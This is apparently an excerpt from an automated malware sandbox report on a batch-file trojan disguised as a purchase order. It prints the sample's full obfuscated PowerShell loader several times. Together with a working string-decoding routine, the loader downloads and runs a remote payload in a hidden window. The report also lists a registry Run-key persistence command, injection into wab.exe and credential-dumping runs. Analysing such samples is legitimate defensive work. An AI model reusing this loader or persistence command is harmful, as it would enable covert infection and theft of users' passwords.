etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFCA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: powershell.exe -windowstyle hidden If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.h
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFF9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HostApplication=powershell.exe -windowstyle hidden If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievase

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winBAT@50/20@15/11

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

17_2_004182CE

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,

19_2_00410DE1

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,

17_2_00418758

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,

17_2_00413D4C

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,

17_2_0040B58D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Negligent.Gas

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\shietgtst-TYE3VH
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55kirasc.kll.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" "

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"

Source: C:\Program Files (x86)\Windows Mail\wab.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7616
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5288
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8084

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 00000011.00000002.2267503862.0000000003640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"
